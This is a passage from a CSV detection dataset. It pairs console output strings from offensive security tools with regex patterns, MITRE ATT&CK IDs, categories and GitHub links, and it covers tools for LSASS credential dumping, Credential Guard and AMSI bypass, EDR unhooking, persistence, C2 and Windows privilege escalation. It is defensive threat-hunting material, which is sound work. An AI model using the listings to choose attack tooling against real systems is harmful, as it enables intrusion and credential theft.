Access","https://github.com/xFreed0m/ADFSpray","1","0","N/A","N/A","1","83","14","2023-03-12T00:21:34Z","2020-04-23T08:56:51Z" "*[*] Smuggling in HTML*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sHTML.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*[*] Smuggling in SVG*",".{0,1000}\[.{0,1000}\]\sSmuggling\sin\sSVG.{0,1000}","offensive_tool_keyword","AutoSmuggle","Utility to craft HTML or SVG smuggled files for Red Team engagements","T1027.006 - T1598","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/surajpkhetani/AutoSmuggle","1","0","N/A","9","3","214","28","2024-03-19T09:26:49Z","2022-03-20T19:02:06Z" "*[*] Starting full encryption in 5s*",".{0,1000}\[.{0,1000}\]\sStarting\sfull\sencryption\sin\s5s.{0,1000}","offensive_tool_keyword","Inc","Inc ransomware","T1486 - T1490","TA0040","N/A","N/A","Ransomware","https://github.com/rivitna/Malware","1","0","#yara","10","3","261","38","2024-05-01T19:21:20Z","2021-07-28T21:00:52Z" "*[*] Updating downloaded GPO version number to ensure automatic GPO application*",".{0,1000}\[.{0,1000}\]\sUpdating\sdownloaded\sGPO\sversion\snumber\sto\sensure\sautomatic\sGPO\sapplication.{0,1000}","offensive_tool_keyword","GPOddity","GPO attack vectors through NTLM relaying","T1558.001 - T1552.001","TA0003 - TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/synacktiv/GPOddity","1","0","N/A","9","3","246","21","2023-10-14T16:06:34Z","2023-09-01T08:13:25Z" "*[-] * does not have Service Control Manager write privilege on *",".{0,1000}\[\-\]\s.{0,1000}\sdoes\snot\shave\sService\sControl\sManager\swrite\sprivilege\son\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*[-] Account to kerberoast does not exist!*",".{0,1000}\[\-\]\sAccount\sto\skerberoast\sdoes\snot\sexist!.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*[-] COM Hijacking failed!*",".{0,1000}\[\-\]\sCOM\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[-] Couldn't change memory protection from RW to RX*",".{0,1000}\[\-\]\sCouldn\'t\schange\smemory\sprotection\sfrom\sRW\sto\sRX.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[-] Couldn't copy dll buffer*",".{0,1000}\[\-\]\sCouldn\'t\scopy\sdll\sbuffer.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[-] Couldn't find KaynLoader*",".{0,1000}\[\-\]\sCouldn\'t\sfind\sKaynLoader.{0,1000}","offensive_tool_keyword","KaynLdr","KaynLdr is a Reflective Loader written in C/ASM","T1055 - T1027 - T1055.012","TA0002 - TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/Cracked5pider/KaynLdr","1","0","N/A","9","5","494","101","2023-12-03T18:26:04Z","2021-12-26T14:32:11Z" "*[-] Dropping DLL failed!*",".{0,1000}\[\-\]\sDropping\sDLL\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[-] Elevating * with DCSync privileges failed*",".{0,1000}\[\-\]\sElevating\s.{0,1000}\swith\sDCSync\sprivileges\sfailed.{0,1000}","offensive_tool_keyword","SharpADWS","SharpADWS Active Directory reconnaissance and exploitation for Red Teams via the Active Directory Web Services (ADWS)","T1087 - T1069 - T1018 - T1083 - T1595","TA0001 - TA0002 - TA0007","N/A","N/A","Discovery","https://github.com/wh0amitz/SharpADWS","1","0","N/A","7","4","326","30","2024-03-19T08:57:52Z","2024-02-13T17:28:00Z" "*[-] Exploit failed! *",".{0,1000}\[\-\]\sExploit\sfailed!\s.{0,1000}","offensive_tool_keyword","JuicyPotatoNG","Another Windows Local Privilege Escalation from Service Account to System","T1055.002 - T1078.003 - T1070.004","TA0005 - TA0004 - TA0002","N/A","N/A","Privilege Escalation","https://github.com/antonioCoco/JuicyPotatoNG","1","0","N/A","10","8","767","97","2022-11-12T01:48:39Z","2022-09-21T17:08:35Z" "*[-] Failed to decrypt TGT using supplied password/hash. If this TGT was requested with no preauth then the password supplied may be incorrect or the data was encrypted with a different type of encryption than expected*",".{0,1000}\[\-\]\sFailed\sto\sdecrypt\sTGT\susing\ssupplied\spassword\/hash\.\sIf\sthis\sTGT\swas\srequested\swith\sno\spreauth\sthen\sthe\spassword\ssupplied\smay\sbe\sincorrect\sor\sthe\sdata\swas\sencrypted\swith\sa\sdifferent\stype\sof\sencryption\sthan\sexpected.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[-] Failed to delete Performance DLL*",".{0,1000}\[\-\]\sFailed\sto\sdelete\sPerformance\sDLL.{0,1000}","offensive_tool_keyword","Perfusion","Exploit for the RpcEptMapper registry key permissions vulnerability (Windows 7 / 2088R2 / 8 / 2012)","T1068 - T1055 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/itm4n/Perfusion","1","0","#contentstrings","10","5","405","74","2021-04-22T16:20:32Z","2021-02-11T18:28:22Z" "*[-] Failed to ReadProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] Failed to ReadProcessMemory for g_IsCredGuardEnabled*",".{0,1000}\[\-\]\sFailed\sto\sReadProcessMemory\sfor\sg_IsCredGuardEnabled.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] failed to spawn shell: %s*",".{0,1000}\[\-\]\sfailed\sto\sspawn\sshell\:\s\%s.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*[-] Failed to WriteProcessMemory for g_fParameter_UseLogonCredential*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_fParameter_UseLogonCredential.{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] Failed to WriteProcessMemory for g_IsCredGuardEnabled.*",".{0,1000}\[\-\]\sFailed\sto\sWriteProcessMemory\sfor\sg_IsCredGuardEnabled\..{0,1000}","offensive_tool_keyword","BypassCredGuard","Credential Guard Bypass Via Patching Wdigest Memory","T1003 - T1112 - T1555.002 - T1574","TA0006 - TA0005 - TA0040","N/A","N/A","Credential Access","https://github.com/wh0amitz/BypassCredGuard","1","0","N/A","10","3","293","47","2023-02-03T06:55:43Z","2023-01-18T15:16:11Z" "*[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!*",".{0,1000}\[\-\]\sGot\sRPC_ACCESS_DENIED!!\sEfsRpcOpenFileRaw\sis\sprobably\sPATCHED!.{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Network Exploitation tools","https://github.com/topotam/PetitPotam","1","0","N/A","10","10","1713","280","2024-02-19T23:49:20Z","2021-07-18T18:19:54Z" "*[-] Hijacking failed!*",".{0,1000}\[\-\]\sHijacking\sfailed!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","0","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*[-] Inveigh Relay session *",".{0,1000}\[\-\]\sInveigh\sRelay\ssession\s.{0,1000}","offensive_tool_keyword","Invoke-TheHash","Invoke-TheHash contains PowerShell functions for performing pass the hash WMI and SMB tasks. WMI and SMB connections are accessed through the .NET TCPClient. Authentication is performed by passing an NTLM hash into the NTLMv2 authentication protocol. Local administrator privilege is not required client-side.","T1028 - T1047 - T1075 - T1078","TA0003 - TA0004 - TA0006","N/A","N/A","Lateral Movement","https://github.com/Kevin-Robertson/Invoke-TheHash","1","0","N/A","10","10","1407","299","2018-12-09T15:38:36Z","2017-01-03T01:05:39Z" "*[-] kernel not vulnerable*",".{0,1000}\[\-\]\skernel\snot\svulnerable.{0,1000}","offensive_tool_keyword","EQGR","Equation Group hack tool leaked by ShadowBrokers- file elgingamble Local exploit for the public prctl core dump vulnerability in recent Linux kernels.","T1213.001 - T1203.001","TA0001 - TA0003","N/A","N/A","Shell spawning","https://fdik.org/EQGRP/Linux/doc/old/etc/user.tool.elgingamble.COMMON","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*[-] NtAllocateVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtAllocateVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[-] NtProtectVirtualMemory Hooked*",".{0,1000}\[\-\]\sNtProtectVirtualMemory\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[-] NtWaitForSingleObject Hooked*",".{0,1000}\[\-\]\sNtWaitForSingleObject\sHooked.{0,1000}","offensive_tool_keyword","UnhookingPatch","Bypass EDR Hooks by patching NT API stub and resolving SSNs and syscall instructions at runtime","T1055 - T1574","TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SaadAhla/UnhookingPatch","1","0","N/A","8","3","274","45","2023-08-02T02:25:38Z","2023-02-08T16:21:03Z" "*[-] Seems like we killed auditd. Ooopsie :D*",".{0,1000}\[\-\]\sSeems\slike\swe\skilled\sauditd\.\sOoopsie\s\:D.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*[-] Shellcode is larger than RX section*",".{0,1000}\[\-\]\sShellcode\sis\slarger\sthan\sRX\ssection.{0,1000}","offensive_tool_keyword","NovaLdr","NovaLdr is a Threadless Module Stomping written in Rust designed as a learning project while exploring the world of malware development. It uses advanced techniques like indirect syscalls and string encryption to achieve its functionalities","T1027.001 - T1055.012 - T1112 - T1574.002 - T1055 - T1056.002 - T1027.002 - T1070.004 - T1129","TA0004 - TA0005 - TA0040 - TA0011","N/A","N/A","Defense Evasion","https://github.com/BlackSnufkin/NovaLdr","1","0","#contentstrings","10","3","205","31","2023-11-16T13:42:41Z","2023-10-19T07:54:39Z" "*[-] Unable to Read LSASS Dump*",".{0,1000}\[\-\]\sUnable\sto\sRead\sLSASS\sDump.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","0","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*[+] - Bashrc persistence added!*",".{0,1000}\[\+\]\s\-\sBashrc\spersistence\sadded!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Configuring ~/.bashrc for persistence ... *",".{0,1000}\[\+\]\s\-\sConfiguring\s\~\/\.bashrc\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Linux header / Message Of The Day Persistence*",".{0,1000}\[\+\]\s\-\sLinux\sheader\s\/\sMessage\sOf\sThe\sDay\sPersistence.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Rootkit Configuration*",".{0,1000}\[\+\]\s\-\sRootkit\sConfiguration.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Rootkit configured successfully*",".{0,1000}\[\+\]\s\-\sRootkit\sconfigured\ssuccessfully.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Setting up cronjobs for persistence ... *",".{0,1000}\[\+\]\s\-\sSetting\sup\scronjobs\sfor\spersistence\s\.\.\.\s.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] - Systemd Root Level Service successfully configued!*",".{0,1000}\[\+\]\s\-\sSystemd\sRoot\sLevel\sService\ssuccessfully\sconfigued!.{0,1000}","offensive_tool_keyword","DynastyPersist","Linux persistence tool with features like SSH Key Generation - Cronjob Persistence - Custom User with Root - RCE Persistence - LKM/Rootkit- Bashrc Persistence - Systemd Service for Root - LD_PRELOAD Privilege Escalation Config - Backdooring Message of the Day / Header and Modifying an Existing Systemd Service","T1055 - T1037 - T1078 - T1547 - T1546 - T1556","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/Trevohack/DynastyPersist","1","0","N/A","9","2","132","14","2024-04-17T06:27:37Z","2023-08-13T15:05:42Z" "*[+] [HELL HALL] pAddress : *",".{0,1000}\[\+\]\s\[HELL\sHALL\]\spAddress\s\:\s.{0,1000}","offensive_tool_keyword","HellsHall","Performing Indirect Clean Syscalls","T1106","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/Maldev-Academy/HellHall","1","0","N/A","8","5","413","61","2023-04-19T06:10:47Z","2023-01-03T04:43:05Z" "*[+] Adding your DLL to the LSA Security Packages registry key*",".{0,1000}\[\+\]\sAdding\syour\sDLL\sto\sthe\sLSA\sSecurity\sPackages\sregistry\skey.{0,1000}","offensive_tool_keyword","ImplantSSP","Installs a user-supplied Security Support Provider (SSP) DLL on the system which will be loaded by LSA on system start","T1547.008 - T1073.001 - T1055.001","TA0003 - TA0005","N/A","N/A","Persistence - Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/ImplantSSP","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] AMSI Bypassed!*",".{0,1000}\[\+\]\sAMSI\sBypassed!.{0,1000}","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in Lateral Movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Lateral Movement","https://github.com/XiaoliChan/wmiexec-Pro","1","0","N/A","10","9","890","111","2024-04-07T09:45:59Z","2023-04-04T06:24:07Z" "*[+] Arbitrary Directory Creation to SYSTEM Shell technique !*",".{0,1000}\[\+\]\sArbitrary\sDirectory\sCreation\sto\sSYSTEM\sShell\stechnique\s!.{0,1000}","offensive_tool_keyword","DirCreate2System","Weaponizing to get NT SYSTEM for Privileged Directory Creation Bugs with Windows Error Reporting","T1068 - T1059.001 - T1070.004","TA0003 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/binderlabs/DirCreate2System","1","0","N/A","8","4","353","39","2022-12-19T17:00:43Z","2022-12-15T03:49:55Z" "*[+] Ask4Creds Loaded*",".{0,1000}\[\+\]\sAsk4Creds\sLoaded.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","N/A","Lateral Movement","https://github.com/Leo4j/Amnesiac","1","0","N/A","10","3","265","46","2024-04-18T15:39:34Z","2023-10-31T15:06:25Z" "*[+] Attack aborted. Exiting*",".{0,1000}\[\+\]\sAttack\saborted\.\sExiting.{0,1000}","offensive_tool_keyword","ShadowSpray","A tool to spray Shadow Credentials across an entire domain in hopes of abusing long forgotten GenericWrite/GenericAll DACLs over other objects in the domain.","T1110.003 - T1098 - T1059 - T1075","TA0001 - TA0008 - TA0009","N/A","N/A","Discovery","https://github.com/ShorSec/ShadowSpray","1","0","N/A","7","5","432","78","2022-10-14T13:36:51Z","2022-10-10T08:34:07Z" "*[+] Attempting DCOM NTLM relaying with CLSID*",".{0,1000}\[\+\]\sAttempting\sDCOM\sNTLM\srelaying\swith\sCLSID.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Attempting NP impersonation using method EfsRpc to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sEfsRpc\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Attempting NP impersonation using method PrintSpoofer to launch *",".{0,1000}\[\+\]\sAttempting\sNP\simpersonation\susing\smethod\sPrintSpoofer\sto\slaunch\s.{0,1000}","offensive_tool_keyword","SweetPotato","Local Service to SYSTEM privilege escalation from Windows 7 to Windows 10 / Server 2019","T1548 - T1055","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/CCob/SweetPotato","1","0","N/A","10","10","1463","206","2024-01-19T15:13:57Z","2020-04-12T17:40:03Z" "*[+] Attempting to call the target EXE from the mock directory*",".{0,1000}\[\+\]\sAttempting\sto\scall\sthe\starget\sEXE\sfrom\sthe\smock\sdirectory.{0,1000}","offensive_tool_keyword","MockDirUACBypass","Creates a mock trusted directory C:\Windows \System32\ and moves an auto-elevating Windows executable into the mock directory. A user-supplied DLL which exports the appropriate functions is dropped and when the executable is run - the DLL is loaded and run as high integrity.","T1574.002 - T1547.008 - T1059.001","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/matterpreter/OffensiveCSharp/tree/master/MockDirUACBypass","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*[+] auditd patched successfully*",".{0,1000}\[\+\]\sauditd\spatched\ssuccessfully.{0,1000}","offensive_tool_keyword","apollon","evade auditd by writing /proc/PID/mem","T1054.001 - T1055.001 - T1012","TA0003 - TA0005","N/A","N/A","Defense Evasion","https://github.com/codewhitesec/apollon","1","0","N/A","8","1","17","6","2023-08-21T05:43:36Z","2023-07-31T11:55:43Z" "*[+] Auto-generating Pyramid config for modules and agents*",".{0,1000}\[\+\]\sAuto\-generating\sPyramid\sconfig\sfor\smodules\sand\sagents.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","0","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*[+] Back to C&C Console*",".{0,1000}\[\+\]\sBack\sto\sC\&C\sConsole.{0,1000}","offensive_tool_keyword","C2_Server","C2 server to connect to a victim machine via reverse shell","T1090 - T1090.001 - T1071 - T1071.001","TA0011 ","N/A","N/A","C2","https://github.com/reveng007/C2_Server","1","0","N/A","10","10","44","16","2022-02-27T02:00:02Z","2021-03-05T12:35:45Z" "*[+] Bof replay:*",".{0,1000}\[\+\]\sBof\sreplay\:.{0,1000}","offensive_tool_keyword","Nightmangle","ightmangle is post-exploitation Telegram Command and Control (C2/C&C) Agent","T1105 - T1132 - T1071.001","TA0011 - TA0009 - TA0002","N/A","N/A","C2","https://github.com/1N73LL1G3NC3x/Nightmangle","1","0","N/A","10","10","117","14","2023-09-26T19:21:31Z","2023-09-26T18:25:23Z" "*[+] Build pupysh environment *",".{0,1000}\[\+\]\sBuild\spupysh\senvironment\s.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*[+] Building GTFOBins lists*",".{0,1000}\[\+\]\sBuilding\sGTFOBins\slists.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*[+] Building linux exploit suggesters*",".{0,1000}\[\+\]\sBuilding\slinux\sexploit\ssuggesters.{0,1000}","offensive_tool_keyword","PEASS","PEASS - Privilege Escalation Awesome Scripts SUITE","T1068 - T1055 - T1053 - T1059 - T1134 - T1216 - T1003 - T1187 - T1548.001 - T1548.002","TA0002 - TA0004 - TA0006 - TA0008 - TA0007 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/carlospolop/PEASS-ng","1","0","N/A","N/A","10","14895","2960","2024-04-21T04:35:22Z","2019-01-13T19:58:24Z" "*[+] Building S4U2proxy request for service: *",".{0,1000}\[\+\]\sBuilding\sS4U2proxy\srequest\sfor\sservice\:\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] Building S4U2self *",".{0,1000}\[\+\]\sBuilding\sS4U2self\s.{0,1000}","offensive_tool_keyword","KrbRelayUp","a universal no-fix local privilege escalation in windows domain environments where LDAP signing is not enforced (the default settings).","T1558 - T1210","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/Dec0ne/KrbRelayUp","1","0","N/A","10","10","1456","193","2022-08-06T12:23:58Z","2022-04-24T21:33:00Z" "*[+] COFF Loader mode is selected!*",".{0,1000}\[\+\]\sCOFF\sLoader\smode\sis\sselected!.{0,1000}","offensive_tool_keyword","Shoggoth","Shoggoth: Asmjit Based Polymorphic Encryptor","T1027 - T1045","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/frkngksl/Shoggoth","1","0","N/A","8","6","581","81","2024-04-10T03:04:04Z","2021-12-03T11:55:22Z" "*[+] COM Hijacked!*",".{0,1000}\[\+\]\sCOM\sHijacked!.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - 